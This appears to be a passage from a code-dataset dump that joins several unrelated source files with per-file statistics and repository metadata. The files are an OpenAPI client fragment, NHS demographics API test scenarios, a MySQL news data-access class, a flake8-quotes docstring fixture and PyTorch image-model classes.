'response_type': (User,),
'auth': [
'basicAuth',
'cookieAuth',
'jwtAuth',
'tokenAuth'
],
'endpoint_path': '/users/{id}',
'operation_id': 'users_update',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'id',
'user',
],
'required': [
'id',
'user',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'id':
(int,),
'user':
(User,),
},
'attribute_map': {
'id': 'id',
},
'location_map': {
'id': 'path',
'user': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/x-www-form-urlencoded',
'multipart/form-data'
]
},
api_client=api_client,
callable=__users_update
)
| 37.899371 | 458 | 0.46452 | 2,604 | 30,130 | 5.168971 | 0.086406 | 0.028083 | 0.02318 | 0.024071 | 0.883432 | 0.881724 | 0.876003 | 0.876003 | 0.861441 | 0.858395 | 0 | 0.003445 | 0.450846 | 30,130 | 794 | 459 | 37.947103 | 0.810045 | 0.38148 | 0 | 0.67167 | 1 | 0 | 0.206926 | 0.030133 | 0 | 0 | 0 | 0 | 0 | 1 | 0.013133 | false | 0 | 0.013133 | 0 | 0.0394 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1298ce35f5ef727a2b3a1db2a800df8603c5b9ba | 12,078 | py | Python | tests/user_restricted/data/pds_scenarios.py | NHSDigital/personal-demographics-service-api | 9d17ba21ce40c87ce33f9536babf6ef34e1baa96 | [
"MIT"
] | 8 | 2020-01-23T14:41:51.000Z | 2021-11-11T14:10:14.000Z | tests/user_restricted/data/pds_scenarios.py | NHSDigital/personal-demographics-service-api | 9d17ba21ce40c87ce33f9536babf6ef34e1baa96 | [
"MIT"
] | 702 | 2020-01-20T10:11:50.000Z | 2022-03-23T18:07:30.000Z | tests/user_restricted/data/pds_scenarios.py | NHSDigital/personal-demographics-service-api | 9d17ba21ce40c87ce33f9536babf6ef34e1baa96 | [
"MIT"
] | 9 | 2020-03-04T16:37:30.000Z | 2022-01-13T14:53:29.000Z | from ..configuration.config import TEST_PATIENT_ID, SPINE_HOSTNAME
retrieve = [
{"scenario": "retrieve_patient", "patient": "9693632109", "patient_returned":"9693632109"}, # noqa: E231, E501
{"scenario": "retrieve_auth_header_missing_or_blank", "patient": "9693632109", "response": {"resourceType": "OperationOutcome", "issue": [{"severity": "error", "code": "forbidden", "details": {"coding": [{"system": "https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode", "version": "1", "code": "ACCESS_DENIED", "display": "Access Denied - Unauthorised"}]}, "diagnostics": "Invalid access token"}]}}, # noqa: E231, E501
{"scenario": "retrieve_auth_header_invalid_token", "patient": "9693632109", "response": {"resourceType": "OperationOutcome", "issue": [{"severity": "error", "code": "forbidden", "details": {"coding": [{"system": "https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode", "version": "1", "code": "ACCESS_DENIED", "display": "Access Denied - Unauthorised"}]}, "diagnostics": "Invalid Access Token"}]}}, # noqa: E231, E501
{"scenario": "retrieve_urid_header_missing", "patient": "9693632109", "response": {"resourceType": "OperationOutcome", "issue": [{"severity": "error", "code": "value", "details": {"coding": [{"system": "https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode", "version": "1", "code": "MISSING_VALUE", "display": "Required value is missing"}]}, "diagnostics": "Missing value in header 'NHSD-Session-URID'"}]}}, # noqa: E231, E501
{"scenario": "retrieve_x_request_header_blank", "patient": "9693632109", "response": {"resourceType": "OperationOutcome", "issue": [{"severity": "error", "code": "value", "details": {"coding": [{"system": "https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode", "version": "1", "code": "INVALID_VALUE", "display": "Provided value is invalid"}]}, "diagnostics": "Invalid value - '' in header 'X-Request-ID'"}]}}, # noqa: E231, E501
{"scenario": "retrieve_x_request_header_invalid", "patient": "9693632109", "response": {"resourceType": "OperationOutcome", "issue": [{"severity": "error", "code": "value", "details": {"coding": [{"system": "https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode", "version": "1", "code": "INVALID_VALUE", "display": "Provided value is invalid"}]}, "diagnostics": "Invalid value - '1234' in header 'X-Request-ID'"}]}}, # noqa: E231, E501
{"scenario": "retrieve_x_request_header_missing", "patient": "9693632109", "response": {"resourceType": "OperationOutcome", "issue": [{"severity": "error", "code": "structure", "details": {"coding": [{"system": "https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode", "version": "1", "code": "PRECONDITION_FAILED", "display": "Required condition was not fulfilled"}]}, "diagnostics": "Invalid request with error - X-Request-ID header must be supplied to access this resource"}]}}, # noqa: E231, E501
{"scenario": "retrieve_related_person", "patient": "9693633679", "response": {"entry":[{"fullUrl":f"{SPINE_HOSTNAME}/personal-demographics/FHIR/R4/Patient/9693633679/RelatedPerson/qWyGt","resource":{"active":True,"id":"qWyGt","patient":{"identifier":{"system":"https://beta.api.digital.nhs.uk","value":"9693633687"},"reference":"https://beta.api.digital.nhs.uk/Patient/9693633687","type":"Patient"},"relationship":[{"coding":[{"code":"SPS","display":"spouse","system":"http://hl7.org/fhir/ValueSet/relatedperson-relationshiptype"},{"code":"Personal","display":"Personal relationship with the patient","system":"https://fhir.nhs.uk/R4/CodeSystem/UKCore-AdditionalRelatedPersonRole"},{"code":"N","display":"Next-of-Kin","system":"http://hl7.org/fhir/ValueSet/relatedperson-relationshiptype"}]}],"resourceType":"RelatedPerson"}}],"resourceType":"Bundle","total":1,"type":"searchset"}}, # noqa: E231, E501
{"scenario": "retrieve_urid_header_invalid", "patient": "9693632109", "response": {"resourceType": "OperationOutcome", "issue": [{"severity": "error", "code": "value", "details": {"coding": [{"system": "https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode", "version": "1", "code": "INVALID_VALUE", "display": "Provided value is invalid"}]}, "diagnostics": "Invalid value - 'invalid' in header 'NHSD-Session-URID'. Refer to the guidance for this header in our API Specification https://digital.nhs.uk/developer/api-catalogue/personal-demographics-service-fhir"}]}} # noqa: E231, E501
]
search = [
{"scenario": "simple_search_happy_path","query_params": {"family": "Capon", "gender": "male", "birthdate": "eq1953-05-29"}, "patient_returned":"9693632117"}, # noqa: E231, E501
{"scenario": "simple_search_with_auth_header_missing_or_blank","query_params": {"family": "Capon", "gender": "male", "birthdate": "eq1953-05-29"}, "response":{"resourceType":"OperationOutcome","issue":[{"severity":"error","code":"forbidden","details":{"coding":[{"system":"https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode","version":"1","code":"ACCESS_DENIED","display":"Access Denied - Unauthorised"}]},"diagnostics":"Invalid access token"}]}}, # noqa: E231, E501
{"scenario": "simple_search_with_auth_header_invalid_token","query_params": {"family": "Capon", "gender": "male", "birthdate": "eq1953-05-29"}, "response": {"resourceType": "OperationOutcome", "issue": [{"severity": "error", "code": "forbidden", "details": {"coding": [{"system": "https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode", "version": "1","code": "ACCESS_DENIED", "display": "Access Denied - Unauthorised"}]},"diagnostics": "Invalid Access Token"}]}}, # noqa: E231, E501
{"scenario": "simple_search_with_urid_header_missing","query_params": {"family": "Capon", "gender": "male", "birthdate": "eq1953-05-29"}, "response":{"resourceType":"OperationOutcome","issue":[{"severity":"error","code":"value","details":{"coding":[{"system":"https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode","version":"1","code":"MISSING_VALUE","display":"Required value is missing"}]},"diagnostics":"Missing value in header 'NHSD-Session-URID'"}]}}, # noqa: E231, E501
{"scenario": "simple_search_with_x_request_header_blank","query_params": {"family": "Capon", "gender": "male", "birthdate": "eq1953-05-29"}, "response":{"resourceType":"OperationOutcome","issue":[{"severity":"error","code":"value","details":{"coding":[{"system":"https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode","version":"1","code":"INVALID_VALUE","display":"Provided value is invalid"}]},"diagnostics":"Invalid value - '' in header 'X-Request-ID'"}]}}, # noqa: E231, E501
{"scenario": "simple_search_with_x_request_header_invalid","query_params": {"family": "Capon", "gender": "male", "birthdate": "eq1953-05-29"}, "response":{"resourceType":"OperationOutcome","issue":[{"severity":"error","code":"value","details":{"coding":[{"system":"https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode","version":"1","code":"INVALID_VALUE","display":"Provided value is invalid"}]},"diagnostics":"Invalid value - '1234' in header 'X-Request-ID'"}]}}, # noqa: E231, E501
{"scenario": "simple_search_with_x_request_header_missing","query_params": {"family": "Capon", "gender": "male", "birthdate": "eq1953-05-29"}, "response":{"resourceType":"OperationOutcome","issue":[{"severity":"error","code":"structure","details":{"coding":[{"system":"https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode","version":"1","code":"PRECONDITION_FAILED","display":"Required condition was not fulfilled"}]},"diagnostics":"Invalid request with error - X-Request-ID header must be supplied to access this resource"}]}}, # noqa: E231, E501
{"scenario": "simple_search_happy_path","query_params": {"family": "Massam", "birthdate": "eq1920-08-11"}, "patient_returned":"9693632966"}, # noqa: E231, E501
{"scenario": "simple_search_happy_path","query_params": {"family": "Massam", "birthdate": "le1920-08-11"}, "patient_returned":"9693632966"}, # noqa: E231, E501
{"scenario": "simple_search_patient_happy_path_sensitive", "query_params": {"family": "Godsoe", "gender": "male", "birthdate": "eq1936-02-24"}, "patient_returned":"9693632125"}, # noqa: E231, E501
]
update = [
{"scenario": "update_dob_happy_path", "patient": TEST_PATIENT_ID,"patch":{"patches":[{"op":"replace","path":"/gender","value":"male"}]}}, # noqa: E231, E501
{"scenario": "update_with_auth_header_missing_or_blank", "patient": TEST_PATIENT_ID,"patch":{"patches":[{"op":"replace","path":"/birthDate","value":"2001-01-01"}]},"response":{"resourceType":"OperationOutcome","issue":[{"severity":"error","code":"forbidden","details":{"coding":[{"system":"https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode","version":"1","code":"ACCESS_DENIED","display":"Access Denied - Unauthorised"}]},"diagnostics":"Invalid access token"}]}}, # noqa: E231, E501
{"scenario": "update_with_auth_header_invalid", "patient": TEST_PATIENT_ID,"patch":{"patches":[{"op":"replace","path":"/birthDate","value":"2001-01-01"}]},"response":{"resourceType": "OperationOutcome", "issue": [{"severity": "error", "code": "forbidden", "details": {"coding": [{"system": "https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode", "version": "1","code": "ACCESS_DENIED", "display": "Access Denied - Unauthorised"}]},"diagnostics": "Invalid Access Token"}]}}, # noqa: E231, E501
{"scenario": "update_with__urid_header_missing", "patient": TEST_PATIENT_ID,"patch":{"patches":[{"op":"replace","path":"/birthDate","value":"2001-01-01"}]},"response":{"resourceType": "OperationOutcome", "issue": [{"severity": "error", "code": "value", "details": {"coding": [{"system": "https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode", "version": "1","code": "MISSING_VALUE", "display": "Required value is missing"}]},"diagnostics": "Missing value in header 'NHSD-Session-URID'"}]}}, # noqa: E231, E501
{"scenario": "update_with_x_request_header_blank", "patient": TEST_PATIENT_ID,"patch":{"patches":[{"op":"replace","path":"/birthDate","value":"2001-01-01"}]},"response":{"resourceType":"OperationOutcome","issue":[{"severity":"error","code":"value","details":{"coding":[{"system":"https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode","version":"1","code":"INVALID_VALUE","display":"Provided value is invalid"}]},"diagnostics":"Invalid value - '' in header 'X-Request-ID'"}]}}, # noqa: E231, E501
{"scenario": "update_with_x_request_header_invalid", "patient": TEST_PATIENT_ID,"patch":{"patches":[{"op":"replace","path":"/birthDate","value":"2001-01-01"}]}, "response":{"resourceType":"OperationOutcome","issue":[{"severity":"error","code":"value","details":{"coding":[{"system":"https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode","version":"1","code":"INVALID_VALUE","display":"Provided value is invalid"}]},"diagnostics":"Invalid value - '1234' in header 'X-Request-ID'"}]}}, # noqa: E231, E501
{"scenario": "update_with_x_request_header_missing", "patient": TEST_PATIENT_ID,"patch":{"patches":[{"op":"replace","path":"/birthDate","value":"2001-01-01"}]},"response":{"resourceType":"OperationOutcome","issue":[{"severity":"error","code":"structure","details":{"coding":[{"system":"https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode","version":"1","code":"PRECONDITION_FAILED","display":"Required condition was not fulfilled"}]},"diagnostics":"Invalid request with error - X-Request-ID header must be supplied to access this resource"}]}}, # noqa: E231, E501
{"scenario": "update_with_low_x_sync_wait", "patient": TEST_PATIENT_ID,"patch":{"patches":[{"op":"replace","path":"/birthDate","value":"2001-01-01"}]},"response":{"resourceType":"OperationOutcome","issue":[{"severity":"error","code":"structure","details":{"coding":[{"system":"https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode","version":"1","code":"SERVICE_UNAVAILABLE","display":"Service unavailable"}]},"diagnostics":"The downstream domain processing has not completed within the configured timeout period. Retry your request after the time specified by the 'Retry-After' header, using the same 'X-Request-ID'"}]}}, # noqa: E231, E501
]
| 309.692308 | 906 | 0.695562 | 1,381 | 12,078 | 5.958001 | 0.125996 | 0.026252 | 0.039378 | 0.058337 | 0.860476 | 0.855858 | 0.842854 | 0.828755 | 0.803354 | 0.788162 | 0 | 0.046634 | 0.067892 | 12,078 | 38 | 907 | 317.842105 | 0.684225 | 0.03792 | 0 | 0 | 0 | 0.058824 | 0.729296 | 0.082729 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.029412 | 0 | 0.029412 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
12e8fc4e610effbfaad9777169efe6c6326657e3 | 6,891 | py | Python | db/news_dao.py | AliceHu0619/news-management-system | 88dd7b093b8fcaff47805a27cf6e6b9ab695abbc | [
"MIT"
] | null | null | null | db/news_dao.py | AliceHu0619/news-management-system | 88dd7b093b8fcaff47805a27cf6e6b9ab695abbc | [
"MIT"
] | null | null | null | db/news_dao.py | AliceHu0619/news-management-system | 88dd7b093b8fcaff47805a27cf6e6b9ab695abbc | [
"MIT"
] | null | null | null | from db.mysql_db import pool
class NewsDao:
#查询待审批新闻列表
def search_unreview_list(self,page):
try:
con=pool.get_connection()
cursor=con.cursor()
sql="SELECT n.id,n.title,t.type,u.username " \
"FROM t_news n JOIN t_type t ON n.type_id=t.id " \
"JOIN t_user u ON n.editor_id=u.id " \
"WHERE n.state=%s " \
"ORDER BY n.create_time DESC " \
"LIMIT %s,%s"
cursor.execute(sql,("need to approve",(page-1)*10,10))
result=cursor.fetchall()
return result
except Exception as e:
print(e)
finally:
if "con" in dir():
con.close()
# 查询待审批新闻的总页数
def search_unreview_count_page(self):
try:
con=pool.get_connection()
cursor=con.cursor()
sql="SELECT CEIL(COUNT(*)/10) FROM t_news WHERE state=%s"
cursor.execute(sql,["need to approve"])
count_page=cursor.fetchone()[0]
return count_page
except Exception as e:
print(e)
finally:
if "con" in dir():
con.close()
#审批新闻
def update_unreview_news(self,id):
try:
con = pool.get_connection()
con.start_transaction()
cursor=con.cursor()
sql="UPDATE t_news SET state=%s WHERE id=%s"
cursor.execute(sql,("approved",id))
con.commit()
except Exception as e:
if "con" in dir():
con.rollback()
print(e)
finally:
if "con" in dir():
con.close()
# 查询待审批新闻列表
def search_unreview_list(self, page):
try:
con = pool.get_connection()
cursor = con.cursor()
sql = "SELECT n.id,n.title,t.type,u.username " \
"FROM t_news n JOIN t_type t ON n.type_id=t.id " \
"JOIN t_user u ON n.editor_id=u.id " \
"WHERE n.state=%s " \
"ORDER BY n.create_time DESC " \
"LIMIT %s,%s"
cursor.execute(sql, ("need to approve", (page - 1) * 10, 10))
result = cursor.fetchall()
return result
except Exception as e:
print(e)
finally:
if "con" in dir():
con.close()
#查询新闻列表
def search_list(self,page):
try:
con=pool.get_connection()
cursor=con.cursor()
sql="SELECT n.id,n.title,t.type,u.username " \
"FROM t_news n JOIN t_type t ON n.type_id=t.id " \
"JOIN t_user u ON n.editor_id=u.id " \
"ORDER BY n.create_time DESC " \
"LIMIT %s,%s"
cursor.execute(sql,((page-1)*10,10))
result=cursor.fetchall()
return result
except Exception as e:
print(e)
finally:
if "con" in dir():
con.close()
#查询新闻总页数
def search_count_page(self):
try:
con=pool.get_connection()
cursor=con.cursor()
sql="SELECT CEIL(COUNT(*)/10) FROM t_news"
cursor.execute(sql)
count_page=cursor.fetchone()[0]
return count_page
except Exception as e:
print(e)
finally:
if "con" in dir():
con.close()
#删除新闻
def delete_by_id(self,id):
try:
con = pool.get_connection()
con.start_transaction()
cursor=con.cursor()
sql="DELETE FROM t_news WHERE id=%s"
cursor.execute(sql,[id])
con.commit()
except Exception as e:
if "con" in dir():
con.rollback()
print(e)
finally:
if "con" in dir():
con.close()
#添加新闻
def insert(self,title,editor_id,type_id,content_id,is_top):
try:
con = pool.get_connection()
con.start_transaction()
cursor=con.cursor()
sql="INSERT INTO t_news(title,editor_id,type_id,content_id,is_top,state) " \
"VALUES(%s,%s,%s,%s,%s,%s)"
cursor.execute(sql,(title,editor_id,type_id,content_id,is_top,"neew to approve"))
con.commit()
except Exception as e:
if "con" in dir():
con.rollback()
print(e)
finally:
if "con" in dir():
con.close()
#查找用户缓存的记录
def search_cache(self,id):
try:
con=pool.get_connection()
cursor=con.cursor()
sql="SELECT n.title,u.username,t.type,n.content_id," \
"n.is_top,n.create_time " \
"FROM t_news n " \
"JOIN t_type t ON n.type_id=t.id " \
"JOIN t_user u ON n.editor_id=u.id " \
"WHERE n.id=%s"
cursor.execute(sql,[id])
result=cursor.fetchone()
return result
except Exception as e:
print(e)
finally:
if "con" in dir():
con.close()
#根据id查找新闻
def search_by_id(self,id):
try:
con=pool.get_connection()
cursor=con.cursor()
sql="SELECT n.title,t.type,n.is_top " \
"FROM t_news n " \
"JOIN t_type t ON n.type_id=t.id " \
"WHERE n.id=%s"
cursor.execute(sql,[id])
result=cursor.fetchone()
return result
except Exception as e:
print(e)
finally:
if "con" in dir():
con.close()
#更改新闻
def update(self,id,title,type_id,content_id,is_top):
try:
con = pool.get_connection()
con.start_transaction()
cursor=con.cursor()
sql="UPDATE t_news SET title=%s,type_id=%s,content_id=%s," \
"is_top=%s,state=%s,update_time=NOW() WHERE id=%s"
cursor.execute(sql,(title,type_id,content_id,is_top,"need to approve",id))
con.commit()
except Exception as e:
if "con" in dir():
con.rollback()
print(e)
finally:
if "con" in dir():
con.close()
def search_content_id(self,id):
try:
con=pool.get_connection()
cursor=con.cursor()
sql="SELECT content_id FROM t_news " \
"WHERE id=%s"
cursor.execute(sql,[id])
content_id=cursor.fetchone()[0]
return content_id
except Exception as e:
print(e)
finally:
if "con" in dir():
con.close()
| 32.051163 | 93 | 0.476273 | 832 | 6,891 | 3.822115 | 0.109375 | 0.025157 | 0.03522 | 0.050314 | 0.852201 | 0.845283 | 0.830189 | 0.811321 | 0.811321 | 0.784591 | 0 | 0.005412 | 0.4101 | 6,891 | 214 | 94 | 32.200935 | 0.776876 | 0.011174 | 0 | 0.827225 | 0 | 0 | 0.187711 | 0.047626 | 0 | 0 | 0 | 0 | 0 | 1 | 0.062827 | false | 0 | 0.005236 | 0 | 0.115183 | 0.062827 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
42347d27f3583dd50f2f24a015f0bc7ccf675363 | 484 | py | Python | function/python/brightics/function/classification/__init__.py | janrenz/studio | a0714ed8dcd9dcd8d024162104d3b4de89ac2b49 | [
"Apache-2.0"
] | null | null | null | function/python/brightics/function/classification/__init__.py | janrenz/studio | a0714ed8dcd9dcd8d024162104d3b4de89ac2b49 | [
"Apache-2.0"
] | null | null | null | function/python/brightics/function/classification/__init__.py | janrenz/studio | a0714ed8dcd9dcd8d024162104d3b4de89ac2b49 | [
"Apache-2.0"
] | null | null | null | from .xgb_classification import xgb_classification_train
from .xgb_classification import xgb_classification_predict
from .decision_tree_classification import decision_tree_classification_train
from .decision_tree_classification import decision_tree_classification_predict
from .svm_classification import svc_train
from .svm_classification import svc_predict
from .logistic_regression import logistic_regression_train
from .logistic_regression import logistic_regression_predict | 60.5 | 79 | 0.904959 | 58 | 484 | 7.103448 | 0.206897 | 0.291262 | 0.252427 | 0.131068 | 0.883495 | 0.737864 | 0.300971 | 0.300971 | 0 | 0 | 0 | 0 | 0.078512 | 484 | 8 | 80 | 60.5 | 0.923767 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
4248918459d21b998daed319f2b63307bd80f16f | 657 | py | Python | test/data/docstring_not_docstrings.py | domdfcoding/flake8-quotes | 1d8dd6b5a10c35fe65e96f53fffca12953e4004c | [
"MIT"
] | 136 | 2015-04-27T20:21:32.000Z | 2022-03-25T13:45:27.000Z | test/data/docstring_not_docstrings.py | domdfcoding/flake8-quotes | 1d8dd6b5a10c35fe65e96f53fffca12953e4004c | [
"MIT"
] | 101 | 2015-03-03T19:49:44.000Z | 2021-10-19T07:07:30.000Z | test/data/docstring_not_docstrings.py | domdfcoding/flake8-quotes | 1d8dd6b5a10c35fe65e96f53fffca12953e4004c | [
"MIT"
] | 42 | 2015-02-04T09:32:55.000Z | 2021-11-29T20:18:45.000Z |
var0 = True
l = []
if var0:
""" not a docstring"""
pass
while(var0 < 0 or "def" in l[:] ):
""" also not a docstring """
with open(l["def":]) as f:
""" not a docstring """
pass
if var0 < 10:
"""
not a multiline docstring
"""
pass
if var0:
''' not a docstring'''
pass
while(var0 < 0 or "def" in l[:] ):
''' also not a docstring '''
with open(l["def":]) as f:
''' not a docstring '''
pass
if var0 < 10:
'''
not a multiline docstring
'''
pass
# https://github.com/zheller/flake8-quotes/issues/97
def test():
{}["a"]
class test:
{}["a"]
| 14.6 | 52 | 0.480974 | 87 | 657 | 3.632184 | 0.344828 | 0.101266 | 0.246835 | 0.21519 | 0.78481 | 0.78481 | 0.78481 | 0.78481 | 0.78481 | 0.78481 | 0 | 0.036866 | 0.339422 | 657 | 44 | 53 | 14.931818 | 0.691244 | 0.076104 | 0 | 0.8 | 0 | 0 | 0.038251 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05 | false | 0.3 | 0 | 0 | 0.1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
4260b1fb9f8a133613e1da5651f77c1b647ee23a | 20,779 | py | Python | src/models/modules/simple_bb.py | mohsinkhn/seti-kaggle-tezdhar | dd3b1dcb8729ed73c5bb6ce0041cd385c412156e | [
"MIT"
] | 3 | 2021-08-30T00:48:17.000Z | 2022-03-14T07:50:07.000Z | src/models/modules/simple_bb.py | mohsinkhn/seti-kaggle-tezdhar | dd3b1dcb8729ed73c5bb6ce0041cd385c412156e | [
"MIT"
] | null | null | null | src/models/modules/simple_bb.py | mohsinkhn/seti-kaggle-tezdhar | dd3b1dcb8729ed73c5bb6ce0041cd385c412156e | [
"MIT"
] | 2 | 2021-08-20T17:33:27.000Z | 2022-03-14T18:22:37.000Z | import timm
import torch
from torch import nn
import torch.nn.functional as F
from timm.models.layers.weight_init import trunc_normal_
class SimpleBB(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=1, num_classes=1)
# del self.model.classifier
self.avg = nn.AdaptiveAvgPool2d((1, 1))
self.flat = nn.Flatten()
self.drop = nn.Dropout(hparams['dropout'])
self.fc1 = nn.Linear(self.model.num_features, 1)
def forward(self, x):
x = self.model.forward_features(x)
return self.fc1(self.drop(self.flat(self.avg(x))))
class FeaturesBB(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=3, num_classes=1)
# del self.model.classifier
self.avg = nn.AdaptiveAvgPool2d((1, 1))
self.flat = nn.Flatten()
self.drop = nn.Dropout(hparams['dropout'])
self.fc1 = nn.Linear(self.model.num_features, 1)
def forward(self, x):
x = self.model.forward_features(x)
return self.flat(self.avg(x))
class FasterBB(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=1, num_classes=1)
self.model.blocks[0][0].conv_dw.stride = (2, 2)
# del self.model.classifier
# self.pool = nn.MaxPool2d((1, 2), (1, 1), padding=0)
self.avg = nn.AdaptiveAvgPool2d((1, 1))
self.flat = nn.Flatten()
self.drop = nn.Dropout(hparams['dropout'])
#del self.model.conv_head, self.model.bn2
self.fc1 = nn.Linear(self.model.num_features, 1)
def forward(self, x):
x = self.model.forward_features(x)
return self.fc1(self.drop(self.flat(self.avg(x))))
class Simple3BB(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=3, num_classes=1)
# del self.model.classifier
self.avg = nn.AdaptiveAvgPool2d((1, 1))
self.flat = nn.Flatten()
self.drop = nn.Dropout(hparams['dropout'])
self.fc1 = nn.Linear(self.model.num_features, 1)
def forward(self, x):
x = self.model.forward_features(x)
return self.fc1(self.drop(self.flat(self.avg(x))))
class Attention(nn.Module):
def __init__(self, dim, num_heads=8, qkv_bias=False, attn_drop=0., proj_drop=0.):
super().__init__()
self.num_heads = num_heads
head_dim = dim // num_heads
self.scale = head_dim ** -0.5
self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias)
self.attn_drop = nn.Dropout(attn_drop)
self.proj = nn.Linear(dim, dim)
self.proj_drop = nn.Dropout(proj_drop)
def forward(self, x):
B, N, C = x.shape
qkv = self.qkv(x).reshape(B, N, 3, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)
q, k, v = qkv[0], qkv[1], qkv[2] # make torchscript happy (cannot use tensor as tuple)
attn = (q @ k.transpose(-2, -1)) * self.scale
attn = attn.softmax(dim=-1)
attn = self.attn_drop(attn)
x = (attn @ v).transpose(1, 2).reshape(B, N, C)
x = self.proj(x)
x = self.proj_drop(x)
return x
class Hybrid3BB(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=3, num_classes=1)
# del self.model.classifier
dim1 = self.model.num_features
dim2 = 256
self.fc0 = nn.Linear(dim1, dim2)
self.attn = Attention(dim2, 1)
self.norm1 = nn.LayerNorm(dim2)
self.pos_embed = nn.Parameter(torch.zeros(1, 256, dim2))
self.flat = nn.Flatten()
self.drop = nn.Dropout(hparams['dropout'])
self.fc1 = nn.Linear(dim2, 1)
self.init_weights()
def init_weights(self):
head_bias = 0.
trunc_normal_(self.pos_embed, std=.02)
def forward(self, x):
x = self.model.forward_features(x)
b, c, h, w = x.shape
x = x.view(b, c, -1).contiguous()
x = x.permute(0, 2, 1).contiguous()
x = self.fc0(x)
x = x + self.drop(self.attn(self.norm1(x + self.pos_embed)))
x = x.mean(1)
return self.fc1(self.drop(x))
class Hybrid4BB(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=3, num_classes=1)
# del self.model.classifier
dim1 = self.model.num_features
dim2 = 512
self.fc0 = nn.Linear(dim1, dim2)
self.attn = Attention(dim2, 2)
self.norm1 = nn.LayerNorm(dim2)
self.pos_embed = nn.Parameter(torch.zeros(1, 16, dim2))
self.flat = nn.Flatten()
self.drop = nn.Dropout(hparams['dropout'])
self.fc1 = nn.Linear(dim2, 1)
self.init_weights()
def init_weights(self):
head_bias = 0.
trunc_normal_(self.pos_embed, std=.02)
def forward(self, x):
x = self.model.forward_features(x)
b, c, h, w = x.shape
x = x.mean(3)
x = x.view(b, c, -1).contiguous()
x = x.permute(0, 2, 1).contiguous()
x = self.fc0(x)
x = x + self.drop(self.attn(self.norm1(x + self.pos_embed)))
x = x.mean(1)
return self.fc1(self.drop(x))
class Hybrid5BB(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=3, num_classes=1)
# del self.model.classifier
dim1 = self.model.num_features
dim2 = 512
self.fc0 = nn.Linear(dim1, dim2)
self.attn = Attention(dim2, 2)
self.norm1 = nn.LayerNorm(dim2)
self.pos_embed = nn.Parameter(torch.zeros(1, 24, dim2))
self.flat = nn.Flatten()
self.drop = nn.Dropout(hparams['dropout'])
